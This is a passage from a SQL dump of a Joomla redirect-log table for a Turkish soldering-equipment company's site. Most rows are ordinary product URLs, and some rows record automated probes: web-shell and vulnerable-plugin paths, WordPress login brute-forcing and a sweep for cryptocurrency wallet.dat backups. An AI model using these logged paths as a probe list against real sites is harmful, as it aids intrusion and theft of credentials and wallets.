00:00:00',301),(17327,'http://www.3s-technologies.com.tr/index.php/en/products/çubuk-lehim/by,mf_name',NULL,'','',78,0,'2017-12-28 09:46:19','0000-00-00 00:00:00',301),(17328,'http://www.3s-technologies.com.tr/index.php/en/products/çubuk-lehim/by,mf_name/dirdesc',NULL,'','',78,0,'2017-12-28 09:46:22','0000-00-00 00:00:00',301),(17329,'http://www.3s-technologies.com.tr/index.php/en/products/çubuk-lehim/by,ordering',NULL,'','',79,0,'2017-12-28 09:46:30','0000-00-00 00:00:00',301),(17330,'http://www.3s-technologies.com.tr/index.php/en/products/çubuk-lehim/by,product_name',NULL,'','',78,0,'2017-12-28 09:46:34','0000-00-00 00:00:00',301),(17331,'http://www.3s-technologies.com.tr/index.php/en/products/çubuk-lehim/by,product_name/dirdesc',NULL,'','',77,0,'2017-12-28 09:46:36','0000-00-00 00:00:00',301),(17332,'http://www.3s-technologies.com.tr/index.php/en/products/çubuk-lehim/by,product_sku',NULL,'','',75,0,'2017-12-28 09:46:51','0000-00-00 00:00:00',301),(17333,'http://www.3s-technologies.com.tr/index.php/en/products/çubuk-lehim/dirdesc',NULL,'','',75,0,'2017-12-28 09:46:55','0000-00-00 00:00:00',301),(17334,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/bölgesel-lehimleme/by,`p`.product_sku',NULL,'','',74,0,'2017-12-28 09:47:56','0000-00-00 00:00:00',301),(17335,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/bölgesel-lehimleme/by,`p`.product_sku/dirdesc',NULL,'','',74,0,'2017-12-28 09:48:01','0000-00-00 00:00:00',301),(17336,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/bölgesel-lehimleme/by,category_name',NULL,'','',84,0,'2017-12-28 09:48:24','0000-00-00 00:00:00',301),(17337,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/bölgesel-lehimleme/by,category_name/dirdesc',NULL,'','',76,0,'2017-12-28 09:48:32','0000-00-00 00:00:00',301),(17338,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/bölgesel-lehimleme/by,mf_name',NULL,'','',84,0,'2017-12-28 09:48:45','0000-00-00 00:00:00',301),(17339,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/bölgesel-lehimleme/by,mf_name/dirdesc',NULL,'','',73,0,'2017-12-28 09:48:59','0000-00-00 00:00:00',301),(17340,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/bölgesel-lehimleme/by,ordering',NULL,'','',74,0,'2017-12-28 09:49:15','0000-00-00 00:00:00',301),(17341,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/bölgesel-lehimleme/by,product_name',NULL,'','',82,0,'2017-12-28 09:49:23','0000-00-00 00:00:00',301),(17342,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/bölgesel-lehimleme/by,product_name/dirdesc',NULL,'','',77,0,'2017-12-28 09:49:26','0000-00-00 00:00:00',301),(17343,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/bölgesel-lehimleme/by,product_sku',NULL,'','',82,0,'2017-12-28 09:49:37','0000-00-00 00:00:00',301),(17344,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/bölgesel-lehimleme/dirdesc',NULL,'','',87,0,'2017-12-28 09:49:41','0000-00-00 00:00:00',301),(17345,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/çubuk-lehim/dirdesc',NULL,'','',75,0,'2017-12-28 09:50:02','0000-00-00 00:00:00',301),(17346,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/ddm-novastar/smd-fırın',NULL,'','',74,0,'2017-12-28 09:50:30','0000-00-00 00:00:00',301),(17347,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/ddm-novastar/smd-fırın/by,`p`.product_sku',NULL,'','',67,0,'2017-12-28 09:50:32','0000-00-00 00:00:00',301),(17348,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/ddm-novastar/smd-fırın/by,`p`.product_sku/dirdesc',NULL,'','',67,0,'2017-12-28 09:50:34','0000-00-00 00:00:00',301),(17349,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/ddm-novastar/smd-fırın/by,category_name',NULL,'','',68,0,'2017-12-28 09:50:41','0000-00-00 00:00:00',301),(17350,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/ddm-novastar/smd-fırın/by,category_name/dirdesc',NULL,'','',71,0,'2017-12-28 09:50:44','0000-00-00 00:00:00',301),(17351,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/ddm-novastar/smd-fırın/by,mf_name',NULL,'','',73,0,'2017-12-28 09:50:50','0000-00-00 00:00:00',301),(17352,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/ddm-novastar/smd-fırın/by,mf_name/dirdesc',NULL,'','',71,0,'2017-12-28 09:50:51','0000-00-00 00:00:00',301),(17353,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/ddm-novastar/smd-fırın/by,ordering',NULL,'','',68,0,'2017-12-28 09:50:57','0000-00-00 00:00:00',301),(17354,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/ddm-novastar/smd-fırın/by,product_name',NULL,'','',73,0,'2017-12-28 09:51:08','0000-00-00 00:00:00',301),(17355,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/ddm-novastar/smd-fırın/by,product_name/dirdesc',NULL,'','',72,0,'2017-12-28 09:51:21','0000-00-00 00:00:00',301),(17356,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/ddm-novastar/smd-fırın/by,product_sku',NULL,'','',73,0,'2017-12-28 09:51:38','0000-00-00 00:00:00',301),(17357,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/ddm-novastar/smd-fırın/dirdesc',NULL,'','',71,0,'2017-12-28 09:51:53','0000-00-00 00:00:00',301),(17358,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/mirae/smd-orta-hızlı',NULL,'','',76,0,'2017-12-28 09:52:07','0000-00-00 00:00:00',301),(17359,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/mirae/smd-orta-hızlı/by,`p`.product_sku',NULL,'','',71,0,'2017-12-28 09:52:08','0000-00-00 00:00:00',301),(17360,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/mirae/smd-orta-hızlı/by,`p`.product_sku/dirdesc',NULL,'','',65,0,'2017-12-28 09:52:10','0000-00-00 00:00:00',301),(17361,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/mirae/smd-orta-hızlı/by,category_name',NULL,'','',67,0,'2017-12-28 09:52:16','0000-00-00 00:00:00',301),(17362,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/mirae/smd-orta-hızlı/by,category_name/dirdesc',NULL,'','',68,0,'2017-12-28 09:52:19','0000-00-00 00:00:00',301),(17363,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/mirae/smd-orta-hızlı/by,mf_name',NULL,'','',73,0,'2017-12-28 09:52:25','0000-00-00 00:00:00',301),(17364,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/mirae/smd-orta-hızlı/by,mf_name/dirdesc',NULL,'','',70,0,'2017-12-28 09:52:27','0000-00-00 00:00:00',301),(17365,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/mirae/smd-orta-hızlı/by,ordering',NULL,'','',71,0,'2017-12-28 09:52:31','0000-00-00 00:00:00',301),(17366,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/mirae/smd-orta-hızlı/by,product_name',NULL,'','',78,0,'2017-12-28 09:52:35','0000-00-00 00:00:00',301),(17367,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/mirae/smd-orta-hızlı/by,product_name/dirdesc',NULL,'','',76,0,'2017-12-28 09:52:37','0000-00-00 00:00:00',301),(17368,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/mirae/smd-orta-hızlı/by,product_sku',NULL,'','',71,0,'2017-12-28 09:52:42','0000-00-00 00:00:00',301),(17369,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/mirae/smd-orta-hızlı/dirdesc',NULL,'','',69,0,'2017-12-28 09:52:46','0000-00-00 00:00:00',301),(17370,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/mirae/smd-ultra-hız',NULL,'','',77,0,'2017-12-28 09:52:53','0000-00-00 00:00:00',301),(17371,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/mirae/smd-ultra-hız/by,`p`.product_sku',NULL,'','',66,0,'2017-12-28 09:52:56','0000-00-00 00:00:00',301),(17372,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/mirae/smd-ultra-hız/by,`p`.product_sku/dirdesc',NULL,'','',66,0,'2017-12-28 09:52:58','0000-00-00 00:00:00',301),(17373,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/mirae/smd-ultra-hız/by,category_name',NULL,'','',70,0,'2017-12-28 09:53:03','0000-00-00 00:00:00',301),(17374,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/mirae/smd-ultra-hız/by,category_name/dirdesc',NULL,'','',72,0,'2017-12-28 09:53:05','0000-00-00 00:00:00',301),(17375,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/mirae/smd-ultra-hız/by,mf_name',NULL,'','',73,0,'2017-12-28 09:53:12','0000-00-00 00:00:00',301),(17376,'http://3s-technologies.com.tr/index.php/en/products/dalga-lehim/by,mf_name/results,1-5?language=en-gb',NULL,'','',1,0,'2017-12-28 10:59:42','0000-00-00 00:00:00',301),(17377,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/dalga-lehim/dirdesc/results,1-20',NULL,'','',3,0,'2017-12-28 11:10:59','0000-00-00 00:00:00',301),(17378,'http://3s-technologies.com.tr/index.php/en/products/dalga-lehim/by,mf_name/results,1-10?language=en-gb',NULL,'','',1,0,'2017-12-28 12:07:13','0000-00-00 00:00:00',301),(17379,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/dalga-lehim',NULL,'','',7,0,'2017-12-28 13:14:45','0000-00-00 00:00:00',301),(17380,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/contacts-en',NULL,'','',1,0,'2017-12-28 15:38:37','0000-00-00 00:00:00',301),(17381,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/lehimleme-malzemeleri/flux/955lc-37-detail',NULL,'','',1,0,'2017-12-28 15:40:10','0000-00-00 00:00:00',301),(17382,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/lehimleme-malzemeleri/flux/955lc-detail',NULL,'','',1,0,'2017-12-28 15:40:22','0000-00-00 00:00:00',301),(17383,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/lehimleme-malzemeleri/krem-lehim/krem-lehim-31-32-33-34-detail',NULL,'','',1,0,'2017-12-28 15:40:43','0000-00-00 00:00:00',301),(17384,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/lehimleme-malzemeleri/krem-lehim/krem-lehim-31-32-33-detail',NULL,'','',1,0,'2017-12-28 15:40:56','0000-00-00 00:00:00',301),(17385,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/lehimleme-malzemeleri/krem-lehim/krem-lehim-31-32-detail',NULL,'','',1,0,'2017-12-28 15:41:12','0000-00-00 00:00:00',301),(17386,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/lehimleme-malzemeleri/krem-lehim/krem-lehim-31-detail',NULL,'','',1,0,'2017-12-28 15:41:33','0000-00-00 00:00:00',301),(17387,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/lehimleme-malzemeleri/tel-lehim/245-k100-28-29-detail',NULL,'','',1,0,'2017-12-28 15:41:53','0000-00-00 00:00:00',301),(17388,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/lehimleme-malzemeleri/tel-lehim/245-sn63pb37-0.4mm-29-detail',NULL,'','',1,0,'2017-12-28 15:42:06','0000-00-00 00:00:00',301),(17389,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/lehimleme-malzemeleri/tel-lehim/245-sn63pb37-0.6mm-detail',NULL,'','',1,0,'2017-12-28 15:42:13','0000-00-00 00:00:00',301),(17390,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/lehimleme-malzemeleri/tel-lehim/245-sn63pb37-0.8mm-detail',NULL,'','',1,0,'2017-12-28 15:42:41','0000-00-00 00:00:00',301),(17391,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/lehimleme-malzemeleri/tel-lehim/275-k100-1.2mm-detail',NULL,'','',1,0,'2017-12-28 15:42:50','0000-00-00 00:00:00',301),(17392,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/lehimleme-malzemeleri/tel-lehim/275-k100-1mm-detail',NULL,'','',1,0,'2017-12-28 15:43:10','0000-00-00 00:00:00',301),(17393,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/konveyorler/by,product_sku/results,1-50',NULL,'','',1,0,'2017-12-29 00:09:25','0000-00-00 00:00:00',301),(17394,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/konveyorler/by,product_sku/results,1-10',NULL,'','',1,0,'2017-12-29 01:21:25','0000-00-00 00:00:00',301),(17395,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/konveyorler/by,product_sku/results,1-10',NULL,'','',5,0,'2017-12-29 02:51:24','0000-00-00 00:00:00',301),(17396,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/konveyorler/by,product_name/results,1-5',NULL,'','',4,0,'2017-12-29 04:12:24','0000-00-00 00:00:00',301),(17397,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/konveyorler/by,product_sku/results,1-20',NULL,'','',1,0,'2017-12-29 05:15:24','0000-00-00 00:00:00',301),(17398,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/konveyorler/by,product_name/results,1-20',NULL,'','',5,0,'2017-12-29 07:03:24','0000-00-00 00:00:00',301),(17399,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/ddm-novastar/screen-printer/by,pc.ordering,product_name/dirdesc/results,1-20',NULL,'','',10,0,'2017-12-29 07:40:51','0000-00-00 00:00:00',301),(17400,'http://3s-technologies.com.tr/wp-help.php',NULL,'3s-technologies.com.tr','',2,0,'2017-12-29 09:31:12','0000-00-00 00:00:00',301),(17401,'http://3s-technologies.com.tr/ws.php',NULL,'3s-technologies.com.tr','',1,0,'2017-12-29 09:32:02','0000-00-00 00:00:00',301),(17402,'http://3s-technologies.com.tr/administrator/components/com_admin/views/sysinfo/tmpl/ws.php',NULL,'3s-technologies.com.tr','',1,0,'2017-12-29 09:35:59','0000-00-00 00:00:00',301),(17403,'http://3s-technologies.com.tr/wp-temporary.php',NULL,'3s-technologies.com.tr','',1,0,'2017-12-29 09:36:09','0000-00-00 00:00:00',301),(17404,'http://3s-technologies.com.tr/images/ws.php',NULL,'3s-technologies.com.tr','',1,0,'2017-12-29 09:36:30','0000-00-00 00:00:00',301),(17405,'http://3s-technologies.com.tr/modules/mod_ariimageslidersa/mod_ariimageslidersa.php',NULL,'3s-technologies.com.tr','',1,0,'2017-12-29 09:36:44','0000-00-00 00:00:00',301),(17406,'http://3s-technologies.com.tr/inl.php',NULL,'3s-technologies.com.tr','',1,0,'2017-12-29 09:41:28','0000-00-00 00:00:00',301),(17407,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/konveyorler/by,product_name/results,1-50',NULL,'','',3,0,'2017-12-29 10:26:15','0000-00-00 00:00:00',301),(17408,'http://www.3s-technologies.com.tr/en/wp-content/plugins/wpstorecart/readme.txt',NULL,'http://www.3s-technologies.com.tr/wp-content/plugins/wpstorecart/readme.txt','',7,0,'2017-12-29 12:10:28','0000-00-00 00:00:00',301),(17409,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/konveyorler/by,product_name/results,1-10',NULL,'','',6,0,'2017-12-29 12:23:00','0000-00-00 00:00:00',301),(17410,'http://3s-technologies.com.tr/tr/wordpress/wp-login.php',NULL,'http://3s-technologies.com.tr/tr/wordpress/wp-login.php','',68,0,'2017-12-29 20:54:59','0000-00-00 00:00:00',301),(17411,'http://3s-technologies.com.tr/tr/wp-login.php',NULL,'http://3s-technologies.com.tr/tr/wp-login.php','',1664,0,'2017-12-29 20:54:59','0000-00-00 00:00:00',301),(17412,'http://3s-technologies.com.tr/tr/blog/wp-login.php',NULL,'http://3s-technologies.com.tr/tr/blog/wp-login.php','',65,0,'2017-12-29 20:54:59','0000-00-00 00:00:00',301),(17413,'http://3s-technologies.com.tr/tr/?option=com_b2jcontact',NULL,'','',6,0,'2017-12-30 00:25:01','0000-00-00 00:00:00',301),(17414,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/konveyorler/by,category_name/results,1-5',NULL,'','',2,0,'2017-12-30 08:12:46','0000-00-00 00:00:00',301),(17415,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/konveyorler/by,category_name/results,1-20',NULL,'','',9,0,'2017-12-30 09:39:12','0000-00-00 00:00:00',301),(17416,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/ã§ubuk-lehim/e-bar-detail',NULL,'','',10,0,'2017-12-30 10:39:36','0000-00-00 00:00:00',301),(17417,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/konveyorler/by,category_name/results,1-50',NULL,'','',1,0,'2017-12-30 11:05:33','0000-00-00 00:00:00',301),(17418,'http://www.3s-technologies.com.tr/tr/?option=com_b2jcontact',NULL,'','',16,0,'2017-12-30 12:16:54','0000-00-00 00:00:00',301),(17419,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/konveyorler/by,category_name/results,1-10',NULL,'','',1,0,'2017-12-30 13:15:08','0000-00-00 00:00:00',301),(17420,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/ls60v-detail?tmpl=component&print=1',NULL,'','',24,0,'2017-12-30 18:23:57','0000-00-00 00:00:00',301),(17421,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/home2',NULL,'','',15,0,'2017-12-30 19:09:30','0000-00-00 00:00:00',301),(17422,'http://www.3s-technologies.com.tr//wp-admin/admin-ajax.php',NULL,'','',23,0,'2017-12-31 00:16:22','0000-00-00 00:00:00',301),(17423,'http://3s-technologies.com.tr/tr/dmb-elektronik.com/j2_3/index.php/fr/component/virtuemart/led-paneller/led-panel-sıvaustu?itemid=187',NULL,'','',1,0,'2017-12-31 02:32:02','0000-00-00 00:00:00',301),(17424,'http://www.3s-technologies.com.tr/en/products/manufacturer/smd-ultra-hız/results,1-20',NULL,'','',1,0,'2017-12-31 04:05:05','0000-00-00 00:00:00',301),(17425,'http://3s-technologies.com.tr/en/products/bölgesel-lehimleme/by,product_name/results,1-10',NULL,'','',1,0,'2017-12-31 10:36:28','0000-00-00 00:00:00',301),(17426,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/tolo/smd-fırın/by,`p`.product_sku',NULL,'','',79,0,'2017-12-31 12:01:09','0000-00-00 00:00:00',301),(17427,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/smd-orta-hızlı/by,product_name/dirdesc',NULL,'','',77,0,'2017-12-31 12:05:03','0000-00-00 00:00:00',301),(17428,'http://3s-technologies.com.tr/tr/config.php',NULL,'http://site.ru','',288,0,'2017-12-31 12:12:45','0000-00-00 00:00:00',301),(17429,'http://3s-technologies.com.tr/tr/plugins/system/anticopy/debug.php',NULL,'http://site.ru','',3,0,'2017-12-31 14:58:41','0000-00-00 00:00:00',301),(17430,'http://www.3s-technologies.com.tr/tr/components/com_hwdvideoshare/assets/uploads/flash/flash_upload.php?jquploader=1',NULL,'','',2,0,'2017-12-31 15:00:21','0000-00-00 00:00:00',301),(17431,'http://www.3s-technologies.com.tr/tr/using-joomla/extensions/modules//components/com_hwdvideoshare/assets/uploads/flash/flash_upload.php?jquploader=1',NULL,'','',1,0,'2017-12-31 15:00:24','0000-00-00 00:00:00',301),(17432,'http://www.3s-technologies.com.tr/tr/joomla',NULL,'','',35,0,'2017-12-31 15:13:26','0000-00-00 00:00:00',301),(17433,'http://3s-technologies.com.tr/en/products/2.-el-makineler/by,pc.ordering,product_name/results,6-25',NULL,'','',7,0,'2017-12-31 17:12:27','0000-00-00 00:00:00',301),(17434,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/thru-hole/jv131-detail',NULL,'','',1,0,'2017-12-31 17:21:26','0000-00-00 00:00:00',301),(17435,'http://www.3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=56&itemid=137&lang=en',NULL,'','',5,0,'2017-12-31 17:48:26','0000-00-00 00:00:00',301),(17436,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/bãƒâ¶lgesel-lehimleme',NULL,'','',1,0,'2017-12-31 18:32:25','0000-00-00 00:00:00',301),(17437,'http://3s-technologies.com.tr/tr/components/com_hello/hello.php',NULL,'http://site.ru','',3,0,'2017-12-31 18:33:42','0000-00-00 00:00:00',301),(17438,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/konveyorler/by,`p`.product_sku/dirdesc',NULL,'','',1,0,'2018-01-01 07:40:50','0000-00-00 00:00:00',301),(17439,'http://3s-technologies.com.tr/tr/wp-post.php',NULL,'http://site.ru','',12,0,'2018-01-01 08:31:09','0000-00-00 00:00:00',301),(17440,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/konveyorler/by,`p`.product_sku/results,1-5',NULL,'','',1,0,'2018-01-01 08:44:21','0000-00-00 00:00:00',301),(17441,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/mirae/smd-orta-hızlı/results,1-5',NULL,'','',12,0,'2018-01-01 09:26:42','0000-00-00 00:00:00',301),(17442,'http://www.3s-technologies.com.tr/tr/images/stories/petx.php?baca',NULL,'','',1,0,'2018-01-01 11:24:19','0000-00-00 00:00:00',301),(17443,'http://www.3s-technologies.com.tr/tr/images/stories/explore.php?baca',NULL,'','',5,0,'2018-01-01 11:24:21','0000-00-00 00:00:00',301),(17444,'http://www.3s-technologies.com.tr/tr/images/stories/loginer.php.png',NULL,'','',2,0,'2018-01-01 11:24:42','0000-00-00 00:00:00',301),(17445,'http://www.3s-technologies.com.tr/en/using-joomla/extensions/modules/images/stories/petx.php?baca',NULL,'','',1,0,'2018-01-01 11:24:43','0000-00-00 00:00:00',301),(17446,'http://www.3s-technologies.com.tr/en/using-joomla/extensions/modules/images/stories/explore.php?baca',NULL,'','',1,0,'2018-01-01 11:24:45','0000-00-00 00:00:00',301),(17447,'http://www.3s-technologies.com.tr/en/using-joomla/extensions/modules/images/stories/loginer.php.png',NULL,'','',2,0,'2018-01-01 11:25:06','0000-00-00 00:00:00',301),(17448,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/konveyorler/by,`p`.product_sku/results,1-50',NULL,'','',1,0,'2018-01-01 13:07:37','0000-00-00 00:00:00',301),(17449,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/konveyorler/by,`p`.product_sku/results,1-10',NULL,'','',2,0,'2018-01-01 13:17:37','0000-00-00 00:00:00',301),(17450,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/konveyorler/by,`p`.product_sku/results,1-20',NULL,'','',4,0,'2018-01-01 13:32:49','0000-00-00 00:00:00',301),(17451,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/konveyorler/by,pc.ordering,product_name/dirdesc',NULL,'','',1,0,'2018-01-01 13:37:59','0000-00-00 00:00:00',301),(17452,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/konveyorler/by,`p`.product_sku/results,1-50',NULL,'','',1,0,'2018-01-01 13:53:09','0000-00-00 00:00:00',301),(17453,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/konveyorler/by,pc.ordering,product_name/results,1-5',NULL,'','',5,0,'2018-01-01 13:58:07','0000-00-00 00:00:00',301),(17454,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/konveyorler/by,pc.ordering,product_name/results,1-10',NULL,'','',5,0,'2018-01-01 14:44:11','0000-00-00 00:00:00',301),(17455,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/konveyorler/by,pc.ordering,product_name/results,1-50',NULL,'','',1,0,'2018-01-01 15:35:12','0000-00-00 00:00:00',301),(17456,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/konveyorler/by,product_name/dirdesc/results,1-5',NULL,'','',1,0,'2018-01-01 15:55:08','0000-00-00 00:00:00',301),(17457,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/konveyorler/by,category_name/dirdesc/results,1-5',NULL,'','',3,0,'2018-01-01 16:15:17','0000-00-00 00:00:00',301),(17458,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/konveyorler/by,product_name/dirdesc/results,1-20',NULL,'','',1,0,'2018-01-01 16:28:14','0000-00-00 00:00:00',301),(17459,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/konveyorler/by,product_name/dirdesc/results,1-10',NULL,'','',3,0,'2018-01-01 16:38:34','0000-00-00 00:00:00',301),(17460,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/konveyorler/by,product_name/dirdesc/results,1-50',NULL,'','',1,0,'2018-01-01 17:21:47','0000-00-00 00:00:00',301),(17461,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/konveyorler/by,category_name/dirdesc/results,1-50',NULL,'','',1,0,'2018-01-01 18:37:35','0000-00-00 00:00:00',301),(17462,'http://www.3s-technologies.com.tr/index.php/en/products/ãƒæ’ã†â€™ãƒâ€šã‚â§ubuk-lehim/e-bar-26-detail',NULL,'','',9,0,'2018-01-01 20:09:43','0000-00-00 00:00:00',301),(17463,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/konveyorler/by,category_name/dirdesc/results,1-20',NULL,'','',4,0,'2018-01-01 20:12:19','0000-00-00 00:00:00',301),(17464,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/konveyorler/by,category_name/dirdesc/results,1-10',NULL,'','',6,0,'2018-01-01 22:06:01','0000-00-00 00:00:00',301),(17465,'http://www.3s-technologies.com.tr/tr/components/com_fabrik/fabrik.php',NULL,'','',4,0,'2018-01-01 22:41:21','0000-00-00 00:00:00',301),(17466,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/konveyorler/by,`p`.product_sku/dirdesc/results,1-5',NULL,'','',1,0,'2018-01-02 00:37:35','0000-00-00 00:00:00',301),(17467,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/konveyorler/by,`p`.product_sku/dirdesc/results,1-20',NULL,'','',4,0,'2018-01-02 02:31:14','0000-00-00 00:00:00',301),(17468,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/konveyorler/by,`p`.product_sku/dirdesc/results,1-10',NULL,'','',2,0,'2018-01-02 04:24:55','0000-00-00 00:00:00',301),(17469,'http://3s-technologies.com.tr/tr/components/com_foxcontact/_func.php',NULL,'','',28,0,'2018-01-02 04:47:08','0000-00-00 00:00:00',301),(17470,'http://3s-technologies.com.tr/tr/savarakatranemia',NULL,'','',20,0,'2018-01-02 05:27:22','0000-00-00 00:00:00',301),(17471,'http://3s-technologies.com.tr/tr/wallet.dat',NULL,'','',11,0,'2018-01-02 05:27:23','0000-00-00 00:00:00',301),(17472,'http://3s-technologies.com.tr/tr/backup/wallet.dat',NULL,'','',11,0,'2018-01-02 05:27:24','0000-00-00 00:00:00',301),(17473,'http://3s-technologies.com.tr/tr/wallet.dat.1',NULL,'','',2,0,'2018-01-02 05:27:25','0000-00-00 00:00:00',301),(17474,'http://3s-technologies.com.tr/tr/wallet.dat.zip',NULL,'','',2,0,'2018-01-02 05:27:26','0000-00-00 00:00:00',301),(17475,'http://3s-technologies.com.tr/tr/wallet.tar',NULL,'','',2,0,'2018-01-02 05:27:27','0000-00-00 00:00:00',301),(17476,'http://3s-technologies.com.tr/tr/wallet.tar.gz',NULL,'','',2,0,'2018-01-02 05:27:28','0000-00-00 00:00:00',301),(17477,'http://3s-technologies.com.tr/tr/wallet.zip',NULL,'','',2,0,'2018-01-02 05:27:29','0000-00-00 00:00:00',301),(17478,'http://3s-technologies.com.tr/tr/wallet_backup.dat',NULL,'','',2,0,'2018-01-02 05:27:29','0000-00-00 00:00:00',301),(17479,'http://3s-technologies.com.tr/tr/wallet_backup.dat.1',NULL,'','',2,0,'2018-01-02 05:27:35','0000-00-00 00:00:00',301),(17480,'http://3s-technologies.com.tr/tr/wallet_backup.dat.zip',NULL,'','',2,0,'2018-01-02 05:27:37','0000-00-00 00:00:00',301),(17481,'https://3s-technologies.com.tr/tr/savarakatranemia',NULL,'','',20,0,'2018-01-02 05:27:39','0000-00-00 00:00:00',301),(17482,'https://3s-technologies.com.tr/tr/wallet.dat',NULL,'','',2,0,'2018-01-02 05:27:40','0000-00-00 00:00:00',301),(17483,'https://3s-technologies.com.tr/tr/backup/wallet.dat',NULL,'','',2,0,'2018-01-02 05:27:49','0000-00-00 00:00:00',301),(17484,'https://3s-technologies.com.tr/tr/wallet.dat.1',NULL,'','',2,0,'2018-01-02 05:27:56','0000-00-00 